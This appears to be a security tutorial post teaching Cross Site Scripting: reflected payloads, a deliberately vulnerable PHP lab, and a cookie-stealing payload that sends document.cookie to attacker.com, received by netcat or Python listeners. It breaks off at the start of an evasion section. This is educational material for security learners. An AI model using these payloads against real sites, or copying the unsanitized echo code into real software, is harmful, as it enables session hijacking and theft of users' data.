Listen to this Post

Introduction:
Cross Site Scripting (XSS) remains one of the most pervasive web vulnerabilities, allowing attackers to inject malicious client‑side scripts into trusted websites. When unsanitized user input is echoed back to a browser, an attacker can hijack sessions, deface pages, or redirect victims to phishing sites. Mastering XSS is non‑negotiable for any aspiring bug bounty hunter or application security professional.
Learning Objectives:
- Distinguish between Reflected, Stored, and DOM‑based XSS with real‑world exploit scenarios.
- Build a local vulnerable lab to safely test manual and automated XSS payloads.
- Implement defensive coding techniques, Content Security Policies (CSP), and evasion countermeasures.
You Should Know:
- Anatomy of an XSS Attack: How a Single Script Can Hijack a Session
This section explains the core mechanism of reflected XSS. A vulnerable web page takes a parameter (e.g., search query) and prints it directly into the HTML response without encoding. An attacker crafts a malicious link containing JavaScript; when a victim clicks it, the script executes in their browser.
Step‑by‑step guide:
- Identify a reflection point: Use a simple payload like `test123` and look for its presence in the source code.
- Inject the classic proof‑of‑concept:
<script>alert('XSS')</script>. - Encode the payload for URL transmission:
%3Cscript%3Ealert(%27XSS%27)%3C/script%3E. - Send the attack via curl (Linux/macOS):
curl "http://vulnerable-site.com/search?q=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E"
- On Windows (PowerShell):
Invoke-WebRequest -Uri "http://vulnerable-site.com/search?q=%3Cscript%3Ealert('XSS')%3C/script%3E" - Observe the alert box; if triggered, the site is vulnerable.
- Building Your XSS Lab: Setting Up a Safe Environment
Never test on live sites without permission. Use a local virtual machine or Docker to host a deliberately vulnerable web app.
Step‑by‑step guide:
- On Linux (Ubuntu/Debian):
sudo apt update && sudo apt install apache2 php -y sudo systemctl start apache2 echo '<?php echo "Search results for: " . $_GET["q"]; ?>' | sudo tee /var/www/html/xss_test.php
- On Windows (using XAMPP):
- Download and install XAMPP, start Apache.
- Navigate to `C:\xampp\htdocs\` and create `xss_test.php` with the same PHP code.
- Access the vulnerable script:
http://localhost/xss_test.php?q=<script>alert(1)</script>. - To simulate a stored XSS, create a simple comment form that saves input to a text file and later displays it without sanitization.
3. Advanced Payloads: From Alert to Cookie Stealer
Moving beyond alerts, a real attacker steals session cookies to impersonate victims.
Step‑by‑step guide:
- Craft a payload that extracts `document.cookie` and exfiltrates it to an attacker‑controlled server:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Set up a simple listener on your attack machine (Linux/macOS):
python3 -m http.server 8080
- On Windows (PowerShell, Python required):
python -m http.server 8080
- Alternatively, use netcat (Linux):
nc -lvnp 8080
- When the victim executes the payload, the cookie appears in the listener’s logs. For HTTPS exfiltration, use a tool like `ngrok` to expose a local server.
- Bypassing Filters: Evasion Techniques Every Red Teamer Needs
Many applications filter `